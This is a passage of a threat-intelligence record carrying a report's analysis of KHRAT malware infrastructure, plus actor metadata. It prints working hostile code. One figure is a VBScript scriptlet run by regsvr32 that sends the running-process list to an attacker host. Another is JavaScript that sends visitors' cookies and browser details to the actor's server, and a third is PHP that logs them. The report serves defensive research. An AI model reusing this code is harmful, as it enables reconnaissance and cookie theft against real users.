Note also that the final line of the VBS code in Figure 15 shows a commented-out debug statement to print the response text from the POST request. During investigation, the response from the server appeared to be blank.\r\n\u003c?xml version=\"1.0\"?\u003e\r\n\u003ccomponent\u003e\r\n\u003cscript language=\"VBScript\"\u003e\r\n\u003c![CDATA[\r\non error resume next\r\nDim http,WMI,Objs,Process\r\nSet WMI=GetObject(\"WinMgmts:\")\r\nSet Objs=WMI.InstancesOf(\"Win32_Process\")\r\nProcess=\"\"\r\nFor Each Obj In Objs\r\n  Process=Process \u0026 Chr(32) \u0026 Chr(32) \u0026 Chr(32) \u0026 Obj.Description \u0026 Chr(13) \u0026 Chr(10)\r\nNext\r\nSet http = CreateObject(\"Msxml2.ServerXMLHTTP\")\r\nhttp.open \"POST\", \"http://update.upload-dropbox[.]com/docs/tz/GetProcess.php\",False,\"\",\"\"\r\nhttp.SetRequestHeader \"Content-Type\", \"application/json\"\r\nhttp.send Process\r\n'WScript.Echo http.responseText\r\n]]\u003e\r\n\u003c/script\u003e\r\n\u003c/component\u003e\r\nFigure 15: XML script logo.ico, containing VBS code, for regsvr32.exe to execute\r\nCSDN Click-tracker\r\nIn the root of the /tz/ folder on the server where the GetProcess.php file was located, a small HTML code snippet executed JavaScript from http://doc.upload-dropbox[.]com/docs/tz/probe_sl.js.\r\nFigure 16 below shows the contents of the JavaScript, which gathers information from the web-browser visiting the site, including the referring URL, Flash version, cookie, domain and the user agent. 
The collected information is transmitted to another PHP script via an HTTP GET request.\r\nvar http_server = \"http://doc.upload-dropbox[.]com/docs/tz/probe_sl.php\";\r\nfunction getFlashVersion() {\r\n     var flashVer = NaN;\r\n     var ua = navigator.userAgent;\r\n     if (window.ActiveXObject) {\r\n         var swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash');\r\n         if (swf) {\r\n             flashVer = Number(swf.GetVariable('$version').split(' ')[1].replace(/,/g, '.').replace(/^(\\d+\\.\\d+).*$/, \"$1\"));\r\n         }\r\n     } else {\r\n         if (navigator.plugins \u0026\u0026 navigator.plugins.length \u003e 0) {\r\n             var swf = navigator.plugins['Shockwave Flash'];\r\n             if (swf) {\r\n                 var arr = swf.description.split(' ');\r\n                 for (var i = 0, len = arr.length; i \u003c len; i++) {\r\n                     var ver = Number(arr[i]);\r\n                     if (!isNaN(ver)) {\r\n                         flashVer = ver;\r\n                         break;\r\n                     }\r\n                 }\r\n             }\r\n         }\r\n     }\r\n     return flashVer;\r\n}\r\nvar user_agent = navigator.userAgent;\r\nvar domain = document.domain;\r\nvar cookie = document.cookie;\r\nvar referrer = document.referrer;\r\nvar flash = getFlashVersion();\r\nwindow.onload = function(){\r\nnew Image().src = http_server + \"?ua=\"+user_agent+\"\u0026domain=\"+domain+\"\u0026cookie=\"+cookie+\"\u0026referrer=\"+referrer+\"\u0026flash=\"+flash;\r\n}\r\nFigure 16: JavaScript click-tracking code\r\nAs mentioned earlier, the JavaScript click-tracking code in Figure 16 appeared to be identical to that published to the Chinese Software Developer Network in China. Figure 17 below shows that only a few minor differences exist between the blog code and the code downloaded from the actor’s website. Having adjusted some minor white-space character differences, and converted the blog’s code from Linux line-ending format (LF) to Windows format (CRLF), to match that of the actors, the only differences are:\r\n1. A different URL to send the HTTP GET request to.\r\n2. An additional data point – referrer – to collect information about where the visitor came from before hitting their site.\r\n3. Updates to the URL query string:\r\na. The addition of the new referrer information.\r\nb. Fixing a bug in the author’s code whereby the flash variable, which relates to the version of Flash the visitor has installed in their web-browser, was omitted from the query string.\r\nFigure 17: JavaScript click-tracking code diff vs a CSDN blog\r\nThe CSDN blog post also included PHP code, shown in Figure 18, capable of receiving the HTTP GET request from the click-tracking JavaScript code and persisting it to data.html on the web server.\r\n\u003c?php\r\n@header(\"Content-Type:text/html;charset=utf-8\");\r\n$ip = $_SERVER['REMOTE_ADDR'];\r\n$time = date(\"Y-m-d H:i:s\");\r\n$data = \"\";\r\n$data .= (\"IP: \".$ip.\"  \\nTime: \".$time.\"  \\n\");\r\nif(!empty($_GET['domain'])){$data .= \"Domain: \"; $data .= $_GET['domain']; $data.=\"  \\n\";}\r\nif(!empty($_GET['ua'])){$data .= \"User_Agetn: \"; $data .= $_GET['ua']; $data.=\"  \\n\";}\r\nif(!empty($_GET['cookie'])){$data .= \"Cookie: \"; 
$data .= $_GET['cookie']; $data.=\"\\n\\n\";}\r\nif(!file_exists(\"data.html\")){\r\n$fp = fopen(\"data.html\", \"a+\");\r\nfwrite($fp, '');\r\nfclose($fp);\r\n}\r\n$fp = fopen(\"data.html\", \"a+\");\r\nfwrite($fp, $data);\r\nfclose($fp);\r\n?\u003e\r\nFigure 18: PHP code to save the click-tracking information\r\nI was unable to see the contents of the PHP code on the actor’s server, but assuming they copied the code from CSDN, I checked for the presence of data.html, which existed. Furthermore, it had the exact structure the PHP code in Figure 18 would have created.\r\nInterestingly however, two crucial updates made to the JavaScript click-tracking seem not to have been implemented in the actor’s PHP code yet, namely differences 2 and 3 shown in Figure 17. Yet the actors did manage to fix a spelling mistake in the CSDN blog’s code, by updating the print statement User_Agetn to User_Agent. Figure 19 below shows an output data.html example.\r\nIP: [REDACTED]  \r\nTime: 2017-08-09 13:33:19  \r\nDomain: update.upload-dropbox[.]com  \r\nUser_Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0  \r\nFigure 19: data.html from the actor’s server showing my information\r\nSource: https://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/"
	],
	"report_names": [
		"unit42-updated-khrat-malware-used-in-cambodia-attacks"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775439148,
	"ts_updated_at": 1775791873,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5a994e6e9519a4d391aeda64d54bd6dbaae4d0e6.pdf",
		"text": "https://archive.orkl.eu/5a994e6e9519a4d391aeda64d54bd6dbaae4d0e6.txt",
		"img": "https://archive.orkl.eu/5a994e6e9519a4d391aeda64d54bd6dbaae4d0e6.jpg"
	}
}